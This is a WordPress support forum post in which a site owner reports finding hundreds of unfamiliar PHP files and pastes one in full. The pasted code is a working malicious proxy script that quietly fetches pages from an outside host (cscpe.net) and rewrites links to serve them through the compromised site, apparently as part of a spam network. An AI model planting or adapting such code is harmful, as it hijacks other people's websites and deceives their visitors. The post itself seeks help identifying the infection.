mge_pl on "possible bug?"

Hi,

today I found many weird files in main folder of my wordpress site.

The files was dated at 28-06-2015 and 13-07-2015.

Files got names starts with:
- esforce
- esoakley
- esrayban
- frok
- frrb
- ithg
- itnike
- itok
- itrb
- itrb

then there is a number from range 01-99 and extension *.php.

Every file is quite the same:

<?php
@error_reporting(0); @ini_set("display_errors", "off");

$thissite= $_SERVER['SERVER_NAME'];
$path="/ithg[XX].php?";
$fromsite="ithg[XX].cscpe.net";

$q=$_SERVER["QUERY_STRING"];

$q=str_replace($thissite&$path&"/",$thissite&$path,$q);
$q=str_replace(".css&",".css?",$q);
$q=str_replace(".php&rsd",".php?rsd",$q);
$q=str_replace(".js&",".js?",$q);
$q=str_replace("&p=","?p=",$q);
$q=str_replace("??","?",$q);

$u="http://".$fromsite ."/". $q;
if (function_exists("curl_init")) {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
	curl_setopt($ch, CURLOPT_URL, $u);
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
	$str = curl_exec($ch);
	curl_close($ch);
}
if ($str === false && ini_get("allow_url_fopen") == "1") {
	$str = file_get_contents($u);
 }
$replace_arr = array(     $fromsite => $thissite.$path, 'http://http://' => 'http://',  $path."/"=>$path , );
$replace_arr['ithg[XX].cscpe.net/'] = 'www.[XXXXXX].com.br/ithg[XX].php?'; // in every file there is 100 lines like this
if (stripos($q, '.css')!=false) {
	$replace_arr['url( '] = 'url(';
	$replace_arr['url('] = 'url('.'http://'.$thissite.$path ;
}
$replace_arr[$fromsite] = $thissite.$path;
foreach ($replace_arr as $k => $v) {
	$str = str_replace($k, $v, $str);
}
$filetype_header = array('.css' => 'text/css', '.js' => 'text/javascript', '.png' => 'image/png', '.jpg' => 'image/jpg', '.jpeg' => 'image/jpeg', '.gif' => 'image/gif', '.atom' => 'application/atom+xml', '.xml' => 'text/xml', '/feed' => 'text/xml; charset=UTF-8',);
foreach ($filetype_header as $k => $v) {
	if (stripos($q, $k)!=false) {
		header("Content-type: $v");
		break;
	}
}
echo $str;

In this listing in [XX] mean some data I changed - numbers or webpages.

In every file there is a 100 lines like this:
$replace_arr['ithg[XX].cscpe.net/'] = 'www.[XXXXXX].com.br/ithg[XX].php?';
but with different webpage address. I check a few - and all of them were Wordpress sites.

I tried to find something related with this site "cscpe.net" and found only this: http://www.aquaticsafetygroup.com/fr.asp - which I think maybe is similar but written in VB.

I deleted the files from my webserver. I've got something like 1000 urls with this weird files. Do you know what it is and what it exactly do?